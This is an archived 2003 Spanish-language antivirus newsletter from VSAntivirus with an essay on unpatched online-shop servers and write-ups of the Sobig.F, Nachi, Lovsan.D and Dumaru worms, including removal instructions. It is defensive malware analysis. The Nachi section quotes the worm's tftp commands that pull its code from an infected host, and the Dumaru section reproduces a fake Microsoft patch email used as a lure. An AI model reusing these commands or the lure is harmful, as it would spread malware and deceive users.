Mostrando mensaje 187     < Anterior | Siguiente > Responder a este mensaje Asunto: VSantivirus No. 1138 Año 7, Martes 19 de agosto de 2003 Fecha: Martes, 19 de Agosto, 2003  05:15:43 (-0300) Autor: VSAntivirus.com <vsantivirus @...........com> VSantivirus No. 1138 Año 7, Martes 19 de agosto de 2003 _____________________________________________________________ El boletín diario de VSANTIVIRUS - http://www.vsantivirus.com VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy _____________________________________________________________ 1 - De compras por Internet con el sombrero blanco 2 - W32/Sobig.F. Nueva versión del Sobig (Ultimo momento) 3 - Win32/Nachi.A. Utiliza misma falla del "Lovsan" 4 - W32/Lovsan.D (Blaster). Utiliza "mspatch.exe" 5 - W32/Dumaru.A. Mensaje falso de Microsoft (patch.exe) _____________________________________________________________ 1 - De compras por Internet con el sombrero blanco _____________________________________________________________ http://www.vsantivirus.com/dfm-shopping.htm De compras por Internet con el sombrero blanco Por David F. Madrid idoru@videosoft.net.uy Una de las cosas que han hecho que las compras por Internet B2C (Business to consumer) no hayan crecido como se esperaba, es la falta de confianza de los usuarios en los sistemas de pago que utilizan. El tener que insertar los datos de cuenta bancaria en un sitio del que no tienen referencias en el mundo real no convenció a nadie. Afortunadamente, aparecieron otras alternativas que involucran a otras entidades fiables que validan y realizan la transacción. Ahora bien, ¿de que sirve utilizar una entidad que valide la transacción, el utilizar cifrado y pasarelas, si el servidor en el que metemos nuestros datos está comprometido totalmente? Hablo de ser consecuentes con lo que se vende. Hay tiendas que no tienen reparos en anunciarse como un sitio de compra seguro y luego tienen instaladas versiones de servidores que con un simple clic, podrían ser comprometidas junto con los datos financieros de todos los usuarios. Analicé seis tiendas virtuales. No busqué las más famosas, sólo las que estaban asociadas a sitios que visito (la web de dos periódicos, las tres asociadas que se anuncian en la web de mi banco y las de unos grandes almacenes). El análisis se basó en las cabeceras web emitidas por los servidores. Sólo hay que fijarse en las versiones instaladas de Apache u OpenSSL. I. Tienda de software alojada en servidores propios sobre Apache Cabecera que emite el servidor: Server: Apache/1.3.24 (Unix) PHP/4.0.6 X-Powered-By: PHP/4.0.6 II. Tienda virtual alojada en servidores propios sobre Apache Cabecera: Server: Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22 III. Tienda virtual alojada en servidores propios sobre Apache Cabecera: Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6d IV. Tienda virtual alojada en servidores propios sobre iPlanet Cabecera: Server: Netscape-Enterprise/4.1 V. Tienda virtual alojada en servidores ajenos sobre Apache Cabecera: Server: Apache/1.3.24 (Unix) mod_fastcgi/2.2.12 PHP/4.0.6 mod_ssl/2.8.8 OpenSSL/0.9.6c VI. Tienda virtual alojada en servidores propios sobre iPlanet Cabecera: Server: Netscape-Enterprise/4.1 No estamos hablando de Cross Site Scripting o cierres del demonio. Las tiendas I, II y V son vulnerables al fallo de Apache Chunked Encoding: http://www.cert.org/advisories/CA-2002-17.html Las tiendas II, III y V son vulnerables en el Handshake de SSL: http://www.cert.org/advisories/CA-2002-23.html En ambos casos estamos hablando de fallos críticos para los que hay disponibles en Internet un exploit (caso de Apache) y un exploit/gusano (Slapper Worm SSL). Me llamó la atención que tan sólo dos de las tiendas (las montadas sobre iPlanet) no tuviesen ningún fallo evidente. * Conclusión Aunque las cabeceras que emite el servidor se pueden cambiar, este no es el caso. Lo que me sorprende es la parsimonia con la que contestan algunos responsables de las webs ante estos avisos. Sólo parece que reaccionan cuando les recuerdan que no sólo tienen sus datos en ese servidor si no los de mucha gente. Evidentemente, tiene que cambiar la mentalidad de mucha gente para que los negocios .com pasen de ser una burbuja sube y baja, a ser un pilar de la economía. * Nota: Los nombres de los servidores no se han publicado por respeto al trabajo de los sufridos administradores, que me consta que a pesar de los fallos en la mayoría de los casos hacen lo que pueden y si no hacen más es por falta de tiempo. Artículo publicado originalmente en http://www.beeeeee.net/nautopia/shopping.htm * Glosario: º Vulnerabilidad CROSS-SITE-SCRIPTING (XSS). Falla que permite a un atacante introducir en el campo de un formulario o código embebido en una página, un script (perl, php, javascript, asp) que tanto al almacenarse como al mostrarse en el navegador, puede provocar la ejecución de un código no deseado. º SSL (Secure Socket Layer). Conjunto de protocolos que utilizan criptografía para cifrar los datos que se intercambian con un servidor seguro. Proporciona privacidad para datos y mensajes, y permite autenticar los datos enviados. º SSL Handshake Protocol. Permite al servidor y cliente autentificarse y negociar los algoritmos de encriptación. º SLAPPER Worm SSL. Gusano que explota sendas vulnerabilidades en los protocolos OpenSSL usados por servidores como Linux Apache (ver http://www.vsantivirus.com/slapper.htm) º EXPLOIT. Programa o método concreto que saca provecho de una falla o agujero de seguridad de una aplicación o sistema, generalmente para un uso malicioso de dicha vulnerabilidad. (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 2 - W32/Sobig.F. Nueva versión del Sobig (Ultimo momento) _____________________________________________________________ http://www.vsantivirus.com/sobig-f.htm Nombre: W32/Sobig.F Tipo: Gusano de Internet Alias: Win32/Sobig.F, Sobig.F, I-Worm.Sobig.gen, W32/Sobig.F@mm, Win32.HLLM.Reteras, W32.Sobig.F@mm, W32/Sobig-F, W32/Sobig.f@MM Fecha: 19/ago/03 Plataforma: Windows 32-bit Tamaño: 72,568 bytes Esta versión del gusano acaba de ser detectada y hay reportes de su propagación. Esta descripción será ampliada a la brevedad. Incluimos esta alerta, como prevención a los usuarios para que actualicen a la brevedad su software antivirus (si es posible varias veces en el día), y para que estén atentos ante cualquier mensaje con adjunto no solicitado, el cuál es aconsejable borrar de inmediato sin abrirlo. Sobig es un gusano cuyas versiones anteriores se caracterizaron por su gran propagación, y por tener fecha de "caducidad", después de la cuál deja de propagarse. Aún no tenemos información si esta versión utiliza la misma técnica. Más información de última hora en este enlace: http://www.vsantivirus.com/sobig-f.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 3 - Win32/Nachi.A. Utiliza misma falla del "Lovsan" _____________________________________________________________ http://www.vsantivirus.com/nachi-a.htm Nombre: Win32/Nachi.A Tipo: Gusano de Internet Alias: W32/Nachi.worm, WORM_MSBLAST.D, Lovsan.D, W32/Nachi-A, Welchi, Nachi, Welchia, WORM_MSBLAST.D, Sachi, Win32/Nachi.A, W32.Welchia.Worm, W32.Nachi.worm, Win32.Nachi.Worm, Win32.Nachi.A, MS03-026 Exploit.Trojan, Win32/Nachi.Worm, W32/Welchia.worm10240 Plataforma: Windows 2000 y XP Fecha: 18/ago/03 Tamaño: 10,240 bytes (UPX) Este gusano explota la misma vulnerabilidad del Lovsan o Blaster. Algunos fabricantes lo identifican como Lovsan.D. Este gusano explota la vulnerabilidad en la interface RPC (Remote Procedure Call) que permite la ejecución arbitraria de código (ver el parche MS03-026 en el siguiente artículo: http://www.vsantivirus.com/vulms03-026-027-028.htm). Para propagarse a otras máquinas mediante este agujero, utiliza el puerto TCP/135. Solo busca máquinas con Windows XP. Utiliza dos archivos para propagarse: dllhost.exe svchost.exe DLLHOST.EXE (10,240 bytes), es el componente principal del gusano. SVCHOST.EXE (19,728 bytes) es el servidor TFTP (Trivial File Transfer Protocol), usado para transferirse a las computadoras de sus víctimas (como lo hace el Lovsan). Note que tanto DLLHOST.EXE como SVCHOST.EXE son además nombres de archivos legítimos usados por Windows 2000 y XP, entre otros, aunque se encuentran en otros directorios. Windows 2000 y XP tienen un cliente TFTP incorporado por defecto (TFTPD.EXE). El gusano asume que ese archivo existe en el directorio \DLLCACHE e intenta crear una copia de él como SVCHOST.EXE, en el siguiente directorio (crea la carpeta "Wins"): c:\windows\system32\wins\svchost.exe TFTP (Trivial File Transfer Protocol), es una versión simplificada de FTP (File Transfer Protocol), un protocolo que permite la transferencia de archivos entre dos computadoras conectadas en red. Si TFTPD.EXE no existe, intentará descargar SVCHOST.EXE de una máquina infectada, donde el gusano también se ejecuta como un servidor TFTP usando el puerto UDP/69. También copia su propio código (DLLHOST.EXE) en la siguiente ubicación: c:\windows\system32\wins\dllhost.exe NOTA: "C:\Windows" puede variar de acuerdo a la versión de Windows instalada. Crea dos servicios de Windows, por medio del Windows Service Control Manager, "RpcPatch" y "RpcTftpd": HKLM\System\CurrentControlSet\Services\RpcTftpd ImagePath = c:\windows\system32\wins\svchost.exe HKLM\System\CurrentControlSet\Services\RpcPatch ImagePath = c:\windows\system32\wins\dllhost.exe El servicio "RpcPatch" ejecuta la copia del gusano (despliega el nombre "WINS Client") y "RpcTftpd" ejecuta al servidor TFTP (como "Network Connections Sharing"). El gusano utiliza el mismo método del Lovsan.A para autoreplicarse a otras computadoras infectadas (falla RPC/DCOM y puerto TCP/135). Cuando accede exitosamente a éstas, valiéndose de la vulnerabilidad mencionada, crea un shell remoto (ejecutando CMD.EXE) en cualquier puerto TCP entre 666 y 765, de la máquina infectada (un SHELL es un intérprete de comandos que interpreta y activa los comandos o utilidades introducidos por el usuario). El gusano comprueba que el dominio "microsoft.com" esté accesible, antes de enviar los siguientes comandos a la máquina remota usando el shell creado antes: tftp -i %s get svchost.exe wins\SVCHOST.EXE tftp -i %s get dllhost.exe wins\DLLHOST.EXE El gusano intenta quitar al Lovsan.A (o Blaster.A), del sistema infectado. Para ello busca cualquier proceso en cuyo nombre esté presente la cadena "msblast" y la finaliza. También intenta borrar el archivo de la versión A del gusano: \system32\msblast.exe También examina la versión del sistema infectado, número del Service Pack instalado si existiera, y otra información similar, así como la existencia o no del parche correspondiente para la vulnerabilidad RPC/DCOM, en las siguientes ramas del registro (según el sistema): HKLM\SOFTTWARE\Microsoft\Updates \Windows 2000\SP5\KB823980 HKLM\SOFTTWARE\Microsoft\Updates \Windows XP\SP1\KB823980 HKLM\SOFTTWARE\Microsoft\Updates \Windows XP\SP2\KB823980 Si no existe por lo menos alguna de éstas entradas, intenta descargar y ejecutar dicha actualización del sitio de Microsoft, desde ocho direcciones diferentes, correspondientes a las versiones en inglés, coreana y las dos chinas, tanto para Windows 2000 como para XP (32 bits). Si el sistema infectado está en español, no descarga el parche, o lo hace con la versión en inglés, lo que puede causar problemas posteriores si se llega a instalar. Después de descargar e instalar el parche, reinicia el sistema. El gusano crea un mutex llamado "RpcPatch_Mutex" para asegurarse ser la única copia activa en memoria. En su código, puede verse el siguiente texto, que nunca es mostrado: =========== I love my wife & baby :)~~~ Welcome Chian~~~ Notice: 2004 will remove myself:)~~ sorry zhongli~~~ =========== wins Como expresa el mensaje, el gusano se autoelimina del equipo infectado, si la fecha del sistema es 1 de enero de 2004 o superior. Otra característica de este gusano, es que intenta infectar servidores Microsoft Internet Information Server 5.0 (IIS), explotando la vulnerabilidad descripta en el boletín MS03-007 (ver http://www.vsantivirus.com/vulms03-007.htm), y para la cuál existe un parche desde marzo de 2003. Utiliza el puerto TCP/80 para buscar equipos que estén ejecutando Microsoft IIS 5.0 y sean vulnerables. La falla permite que enviando un paquete HTTP especialmente formado a una máquina con IIS, puede lograrse la caída del servidor, o incluso la ejecución de código arbitrario bajo el contexto de seguridad local del equipo afectado. Esta vulnerabilidad se produce por un desbordamiento de búfer en la librería NTDLL.DLL del componente WebDAV (World Wide Web Distributed Authoring and Versioning) que funciona bajo ISS. Se compone de un conjunto de extensiones de HTTP que permiten a los usuarios manipular archivos almacenados en un servidor Web (RFC2518). Como resultado de toda la actividad del gusano, la subred local será saturada con pedidos al puerto 135, y aumentará el tráfico global de paquetes ICMP. ICMP (Protocolo de mensajes de control de Internet), es una extensión del Protocolo de Internet (IP), y permite generar mensajes de error, paquetes de prueba y mensajes informativos relacionados con IP. Básicamente, se usa para comprobar la existencia de la máquina consultada, en este caso, usados por el gusano para detectar máquinas vulnerables, etc. Como en el caso del Lovsan, debido a un error en el exploit utilizado para aprovecharse de la falla mencionada, en Windows XP, cada vez que se reinicia un equipo infectado, puede mostrarse el siguiente mensaje antes de que el sistema se vuelva a cerrar: Apagar el sistema Se está apagando el sistema. Guarde todo trabajo en curso y cierre la sesión. Se perderá cualquier cambio que no haya sido guardado. El apagado ha sido iniciado por NT AUTORITHY\SYSTEM Tiempo restante para el apagado: xx:xx:xx Mensaje Windows debe reiniciar ahora porque el servicio Llamada a procedimiento remoto (RPC) terminó de forma inesperada IMPORTANTE: Se debe tener en cuenta que este mensaje no es exclusivo de este gusano, sino de cualquier código maligno que se aproveche de ciertos exploits para la vulnerabilidad DCOM/RPC. Además de ello, recuerde que existen otros exploits que no producen este mensaje. * Recomendaciones: º Instalar parches descriptos en el siguiente artículo: Vulnerabilidad RPC/DCOM: MS03-026 http://www.vsantivirus.com/vulms03-026-027-028.htm º Filtrar con un cortafuegos los siguientes puertos: udp/135 udp/137 udp/138 tcp/135 tcp/445 tcp/593 tcp/69 udp/69 * Reparación manual IMPORTANTE: La reparación (manual y automática), se ofrece solo como una forma segura de acceder a nuestros archivos en forma temporal, inclusive para poder realizar algunos respaldos de información que no hayamos hecho antes de la infección. Lamentablemente la infección con este gusano (como con el Lovsan), amerita acciones más drásticas, como formatear y reinstalar el sistema operativo. Estas razones se explican exhaustivamente en el siguiente enlace de "Preguntas frecuentes sobre el Lovsan (Blaster)", "¿Porqué formatear después del Lovsan (Blaster)?", http://www.vsantivirus.com/faq-lovsan.htm#11 Nota: Recomendamos utilizar un programa tipo firewall (cortafuego) como el ZoneAlarm, el cuál detendrá y advertirá la conexión de este y cualquier otro troyano con Internet, así como cualquier intento de acceder a nuestro sistema. ZoneAlarm (gratuito para su uso personal), además de ser un excelente cortafuegos, también impide la ejecución de cualquier adjunto con posibilidades de poseer virus (sin necesidad de tener que actualizarlo con cada nueva versión de un virus). Más información: Cómo configurar Zone Alarm 3.x http://www.vsantivirus.com/za.htm * Deshabilitar las carpetas compartidas Es importante desconectar cada computadora de cualquier red antes de proceder a su limpieza. * Deteniendo los servicios del gusano (Windows 2000 y XP) 1. Seleccione Inicio, Ejecutar, escriba CMD y pulse Enter 2. En la ventana de comandos, escriba la siguiente instrucción, respetando las comillas: NET STOP "Network Connections Sharing" Deberá salir un mensaje avisando la detención del servicio. 3. Reitere los mismos pasos con la siguiente instrucción: NET STOP "WINS Client" 4. Cierre la ventana de comandos. * Finalizando el proceso del virus en memoria Para eliminar manualmente este gusano de un sistema infectado, siga estos pasos: 1. Detenga el proceso del virus en memoria, pulsando CTRL+SHIFT+DEL y seleccione la lengüeta Procesos (Windows 2000 y XP). 2. En la lista de tareas, señale una de las siguientes (según la versión): DLLHOST.EXE 3. Seleccione el botón de finalizar tarea. * Antivirus 1. Actualice sus antivirus con las últimas definiciones 2. Ejecútelos en modo escaneo, revisando todos sus discos 3. Borre los archivos detectados como infectados * Borrado manual de los archivos creados por el gusano Desde el Explorador de Windows, localice y borre los siguientes archivos: c:\windows\system32\wins\svchost.exe c:\windows\system32\wins\dllhost.exe Pinche con el botón derecho sobre el icono de la "Papelera de reciclaje" en el escritorio, y seleccione "Vaciar la papelera de reciclaje". * Editar el registro 1. Ejecute el editor de registro: Inicio, ejecutar, escriba REGEDIT y pulse ENTER 2. En el panel izquierdo del editor, pinche en el signo "+" hasta abrir la siguiente rama: HKEY_LOCAL_MACHINE \System \CurrentControlSet \Services 3. Pinche en la carpeta "Services" y borre las siguientes carpetas: RpcTftpd RpcPatch 4. Use "Registro", "Salir" para salir del editor y confirmar los cambios. 5. Reinicie su computadora (Inicio, Apagar el sistema, Reiniciar). * Información adicional Vulnerabilidad en RPC (Remote Procedure Call) Este troyano se aprovecha de un desbordamiento de búfer en la interface RPC (Remote Procedure Call) que permite la ejecución arbitraria de código. El Remote Procedure Call (RPC) permite el intercambio de información entre equipos, y está presente por defecto en el protocolo TCP bajo el puerto 135 en Windows NT 4.0, 2000 y XP. Una falla en la parte de RPC encargada del intercambio de mensajes sobre TCP/IP, permite a un atacante ejecutar cualquier código con los privilegios locales (Mi PC). Descargue y ejecute el parche correspondiente (MS03-026) desde el siguiente enlace: Vulnerabilidad RPC/DCOM: MS03-026 http://www.vsantivirus.com/vulms03-026-027-028.htm * IMPORTANTE Si usted utiliza su PC, o pertenece a una organización que por su naturaleza exige ser totalmente segura, se recomienda borrar todo el contenido del disco duro, reinstalar de cero el sistema operativo, y recuperar sus archivos importantes de copias de respaldo anteriores. También instale los parches mencionados más adelante. Luego cambie todas sus contraseñas, incluso la de otros usuarios a los que tenga acceso desde su computadora. En el caso de una empresa con redes corporativas, contacte con su administrador para tomar las acciones necesarias a fin de cambiar todas las claves de acceso, así como reinstalar Windows en todas las computadoras. Esta es la única manera segura de no comprometer su seguridad ante los posibles cambios realizados por el gusano. * Activar cortafuegos de Windows XP (Internet Conexión Firewall) NOTA: Utilice solo un cortafuegos al mismo tiempo. Sugerimos ZoneAlarm, sin embargo, Windows XP trae su propio cortafuegos (que posee algunas limitaciones). Si instala ZA, no active ICF (Internet Conexión Firewall) o viceversa. Para activar ICF en Windows XP, siga estos pasos: 1. Seleccione Inicio, Panel de Control, Conexiones de Red e Internet, Conexiones de Red. 2. Pinche con el botón derecho del mouse sobre "Conexión de Red de Area Local" y seleccione Propiedades. 3. En la lengüeta "Avanzadas" tilde la opción "Proteger mi equipo y mi red limitando o impidiendo el acceso a él desde Internet". 4. Seleccione Aceptar, etc. * Mostrar las extensiones verdaderas de los archivos Para poder ver las extensiones verdaderas de los archivos y además visualizar aquellos con atributos de "Oculto", proceda así: 1. Ejecute el Explorador de Windows 2. Seleccione el menú 'Ver' (Windows 95/98/NT) o el menú 'Herramientas' (Windows Me/2000/XP), y pinche en 'Opciones' u 'Opciones de carpetas'. 3. Seleccione la lengüeta 'Ver'. 4. DESMARQUE la opción "Ocultar extensiones para los tipos de archivos conocidos" o similar. 5. En Windows 95/NT, MARQUE la opción "Mostrar todos los archivos y carpetas ocultos" o similar. En Windows 98, bajo 'Archivos ocultos', MARQUE 'Mostrar todos los archivos'. En Windows Me/2000/XP, en 'Archivos y carpetas ocultos', MARQUE 'Mostrar todos los archivos y carpetas ocultos' y DESMARQUE 'Ocultar archivos protegidos del sistema operativo'. 6. Pinche en 'Aplicar' y en 'Aceptar'. * Limpieza de virus en Windows Me y XP Si el sistema operativo instalado es Windows Me o Windows XP, para poder eliminar correctamente este virus de su computadora, deberá deshabilitar antes de cualquier acción, la herramienta "Restaurar sistema" como se indica en estos artículos: Limpieza de virus en Windows Me http://www.vsantivirus.com/faq-winme.htm Limpieza de virus en Windows XP http://www.vsantivirus.com/faq-winxp.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 4 - W32/Lovsan.D (Blaster). Utiliza "mspatch.exe" _____________________________________________________________ http://www.vsantivirus.com/lovsan-d.htm Nombre: W32/Lovsan.D (Blaster) Tipo: Gusano de Internet Alias: WORM_MSBLAST.E, W32/Lovsan.worm.d, Worm.Win32.Lovesan, W32/Msblast.D, W32/Blaster-D, W32/Lovsan.worm.d, Win32.Poza.D, Win32/Lovsan.D, MSBlast, Exploit-DcomRpc (variant), W32.Blaster.Worm Fecha: 18/ago/03 Plataforma: Windows 2000, XP Reportado por: varios Tamaño: 11,776 Bytes (ASPack) Esta variante es idéntica a la versión A, salvo en los siguientes puntos: 1. El nombre del ejecutable: mspatch.exe 2. La entrada en el registro: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runon "Nonton Antivirus " = mspatch.exe This is a patch to fixedRPC Problem! Y El código aparentemente solo fue editado encima de las cadenas de textos anteriores, y contiene una clave errónea de autoejecución, que no funciona (Runon). El resto de sus funciones igual lo hacen, pero no se vuelve a ejecutar después de reiniciar el sistema. 3. Está comprimido con la herramienta ASPack. 4. Contiene el siguiente texto en su código: This is a patch to fixedRPC Problem! Your computer has been Protected by me. Your have not need update your Windows XP.. 5. Utiliza un mutex (semáforo indicador), llamado BILLY. Los demás detalles del gusano son idénticos a la versión A, y se dan en el siguiente enlace (incluidas las instrucciones para eliminarlo manualmente): * Más información: W32/Lovsan.A (Blaster). Utiliza la falla en RPC http://www.vsantivirus.com/lovsan-a.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 5 - W32/Dumaru.A. Mensaje falso de Microsoft (patch.exe) _____________________________________________________________ http://www.vsantivirus.com/dumaru-a.htm Nombre: W32/Dumaru.A Tipo: Gusano de Internet Alias: W32.Dumaru@mm, Win32/Dumaru.A, W32/Dumaru@MM, W32.Dumaru@mm, WORM_DUMARU.A Fecha: 19/ago/03 Plataforma: Windows 32-bit Tamaño: 9,216 bytes Este gusano, escrito en Microsoft C++ y comprimido con la herramienta UPX, se envía en forma masiva a todas las direcciones que encuentra en determinados archivos de la máquina infectada, en un mensaje que simula contener un parche del Internet Explorer enviado por Microsoft: De: "Microsoft" <security@microsoft.com> Asunto: Use this patch immediately ! Datos adjuntos: patch.exe Texto: Dear friend , use this Internet Explorer patch now! There are dangerous virus in the Internet now! More than 500.000 already infected! Cuando se ejecuta, libera un troyano que permite ser controlado vía IRC, y además es capaz de robar contraseñas de la máquina infectada, para luego reenviarlas a un usuario remoto. Las direcciones de correo a las que envía el mensaje, son extraídas de todos los archivos del disco duro con las siguientes extensiones: .abd .dbx .htm .html .tbb .wab Las direcciones son guardadas en el siguiente archivo: c:\windows\winload.log El gusano se copia a si mismo en las siguientes ubicaciones: c:\windows\dllreg.exe c:\windows\system\load32.exe c:\windows\system\vxdmgr32.exe También copia al troyano en la siguiente ubicación: c:\windows\windrv.exe NOTA: En todos los casos, "C:\Windows" y "C:\Windows\System" pueden variar de acuerdo al sistema operativo instalado (con esos nombres por defecto en Windows 9x/ME, como "C:\WinNT", "C:\WinNT\System32" en Windows NT/2000 y "C:\Windows\System32" en Windows XP y Windows Server 2003). El troyano puede conectarse a un servidor predefinido de IRC (Internet Relay Chat), y recibir ordenes de un usuario remoto. También puede robar contraseñas del usuario infectado. El gusano modifica las siguientes claves del registro para autoejecutarse en cada reinicio de Windows: HKLM\Software\Microsoft\Windows\CurrentVersion\Run load32 = C:\windows\system\load32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell = explorer.exe c:\winnt\system32\vxdmgr32.exe HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows run = c:\windows\dllreg.exe HKLM\Software\Microsoft\Windows\CurrentVersion\Run load32 = (una entrada muy larga, de 260 bytes) También modifica los archivos WIN.INI y SYSTEM.INI en la carpeta C:\Windows: En WIN.INI: [windows] run = c:\windows\dllreg.exe En SYSTEM.INI: [boot] shell = explorer.exe c:\windows\system\vxdmgr32.exe * Reparación manual * Antivirus 1. Actualice sus antivirus con las últimas definiciones 2. Ejecútelos en modo escaneo, revisando todos sus discos 3. Borre los archivos detectados como infectados * Borrado manual de los archivos creados por el gusano Desde el Explorador de Windows, localice y borre los siguientes archivos: c:\windows\dllreg.exe c:\windows\system\load32.exe c:\windows\system\vxdmgr32.exe c:\windows\windrv.exe Pinche con el botón derecho sobre el icono de la "Papelera de reciclaje" en el escritorio, y seleccione "Vaciar la papelera de reciclaje". Borre también los mensajes electrónicos similares al descripto antes. * Editar el registro Nota: algunas de las ramas en el registro aquí mencionadas, pueden no estar presentes ya que ello depende de que versión de Windows se tenga instalada. 1. Ejecute el editor de registro: Inicio, ejecutar, escriba REGEDIT y pulse ENTER 2. En el panel izquierdo del editor, pinche en el signo "+" hasta abrir la siguiente rama: HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows \CurrentVersion \Run 3. Pinche en la carpeta "Run" y en el panel de la derecha, bajo la columna "Nombre", busque y borre la siguiente entrada: load32 4. En el panel izquierdo del editor, pinche en el signo "+" hasta abrir la siguiente rama: HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows NT \CurrentVersion \Winlogon 5. Pinche en la carpeta "Winlogon" y en el panel de la derecha, bajo la columna "Nombre", busque y borre la siguiente entrada: Shell 6. En el panel izquierdo del editor, pinche en el signo "+" hasta abrir la siguiente rama: HKEY_CURRENT_USER \Software \Microsoft \Windows NT \CurrentVersion \Windows 7. Pinche en la carpeta "Windows" y en el panel de la derecha, bajo la columna "Nombre", busque y borre la siguiente entrada: Run 8. Use "Registro", "Salir" para salir del editor y confirmar los cambios. * Editar el archivo WIN.INI y SYSTEM.INI 1. Desde Inicio, Ejecutar, teclee WIN.INI y pulse Enter. 2. Busque lo siguiente: [windows] run = c:\windows\dllreg.exe Debe quedar como: [windows] run = 3. Grabe los cambios y salga del bloc de notas. 4. Desde Inicio, Ejecutar, teclee SYSTEM.INI y pulse Enter. 5. Busque lo siguiente: [boot] shell = explorer.exe c:\windows\system\vxdmgr32.exe y déjelo así: [boot] shell = explorer.exe 6. Grabe los cambios y salga del bloc de notas 7. Reinicie su computadora (Inicio, Apagar el sistema, Reiniciar). * Información adicional * Mostrar las extensiones verdaderas de los archivos Para poder ver las extensiones verdaderas de los archivos y además visualizar aquellos con atributos de "Oculto", proceda así: 1. Ejecute el Explorador de Windows 2. Seleccione el menú "Ver" (Windows 95/98/NT) o el menú "Herramientas" (Windows Me/2000/XP), y pinche en "Opciones" u "Opciones de carpetas". 3. Seleccione la lengüeta "Ver". 4. DESMARQUE la opción "Ocultar extensiones para los tipos de archivos conocidos" o similar. 5. En Windows 95/NT, MARQUE la opción "Mostrar todos los archivos y carpetas ocultos" o similar. En Windows 98, bajo "Archivos ocultos", MARQUE "Mostrar todos los archivos". En Windows Me/2000/XP, en "Archivos y carpetas ocultos", MARQUE "Mostrar todos los archivos y carpetas ocultos" y DESMARQUE "Ocultar archivos protegidos del sistema operativo". 6. Pinche en "Aplicar" y en "Aceptar". * Limpieza de virus en Windows Me y XP Si el sistema operativo instalado es Windows Me o Windows XP, para poder eliminar correctamente este virus de su computadora, deberá deshabilitar antes de cualquier acción, la herramienta "Restaurar sistema" como se indica en estos artículos: Limpieza de virus en Windows Me http://www.vsantivirus.com/faq-winme.htm Limpieza de virus en Windows XP http://www.vsantivirus.com/faq-winxp.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ Pautas generales para mantenerse alejado de los virus _____________________________________________________________ Recuerde estas pautas para mantener alejado de su computadora cualquier riesgo de virus o troyanos: 1) Use regularmente un programa antivirus (nosotros siempre recomendamos no confiar en uno solo, pero usar más de uno no significa que debamos tenerlos a todos instalados, simplemente ejecutamos esos antivirus en su opción de escaneo, sobre la carpeta que contenga los archivos a revisar). Y por supuesto, de nada vale usar algún antivirus si no lo mantenemos actualizado con los upgrades, updates o add-ons correspondientes. Actualmente, las actualizaciones son diarias (AVP, Panda y otros) o al menos semanales. No existen los "virus demasiados nuevos y sin antídotos", la reacción de las casas de antivirus es inmediata en todos los casos. Pero mejor pregúntese, si la suya también lo es a la hora de actualizarse. 2) No abrir ningún mensaje ni archivo recibido a través del correo electrónico de fuentes desconocidas o muy poco conocidas. En el caso de personas conocidas, se deben igualmente tomar las precauciones correspondientes. Asegurarse con esa persona del envío ("Melissa" y otros pueden ser enviados por conocidos que ignoran estar mandando el virus en sus mensajes), y nunca ejecutarlos, sino guardarlos en una carpeta temporal y pasarle a esa carpeta dos o tres antivirus actualizados antes de tomar la opción de ejecutarlos (.EXE) o abrirlos (.DOC, .RTF, etc.). Pero ante cualquier duda, simplemente se debe optar por borrar el mensaje (y archivos adjuntos). Como se dice vulgarmente, "la confianza mata al hombre", en este caso a la PC. 3) Estar informado de cómo operan los virus, y de las novedades sobre estos, alertas y anuncios críticos, en sitios como el nuestro. 4) No bajar nada de sitios Web de los que no tenga referencias de seriedad, o que no sean medianamente conocidos. Y si se bajan archivos, proceder como los archivos adjuntos. Copiarlos a una carpeta y revisarlos con dos o tres antivirus actualizados antes de optar por ejecutarlos o abrirlos. _____________________________________________________________ Sobre este boletín _____________________________________________________________ La distribución de este boletín es gratuita, y está amparada bajo los derechos de Copyright registrados por Video Soft (también los artículos publicados directamente en nuestra página). Si usted desea usar esta información en cualquier medio escrito o electrónico, puede hacerlo sin solicitarnos el permiso respectivo, con la única condición de mencionar su origen, y remitirnos un e-mail o ejemplar con la ubicación donde se haga referencia al material usado que haya sido sacado de este boletín o de la página de VSAntivirus. Video Soft, Video Soft BBS, VSAntivirus y VSAyuda son marcas registradas. Los artículos de otros autores han sido incluidos de acuerdo a la política de Copyright adoptada por cada uno de ellos, y su inclusión en nuestro boletín se rige por dichas políticas, sin embargo, para su uso en otro medio, se deberá solicitar la debida autorización.- _____________________________________________________________ Visite diariamente nuestra página. Puede bajar de allí las versiones de evaluación actualizadas de los antivirus más usados o que consideramos por nuestra experiencia más confiables. El criterio de selección solo pasa por nuestra experiencia diaria con usuarios y clientes, a los que asesoramos y damos servicio técnico. _____________________________________________________________ Cualquier duda o comentario sobre esta lista de correo, envíe un e-mail a cualquiera de estas direcciones: jllopez@nativo.com videosoft@videosoft.net.uy _____________________________________________________________ VSANTIVIRUS - Sitio oficial: http://www.vsantivirus.com _____________________________________________________________ Altas: http://listas.vsantivirus.com/lista/vsantivirus/alta Bajas: http://listas.vsantivirus.com/lista/vsantivirus/baja También puede enviar un mensaje vacío a estas direcciones: Altas: vsantivirus-alta@listas.vsantivirus.com Bajas: vsantivirus-baja@listas.vsantivirus.com _____________________________________________________________ VSANTIVIRUS - http://www.vsantivirus.com - Es un servicio de VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy _____________________________________________________________ VSantivirus No. 1138 Año 7, Martes 19 de agosto de 2003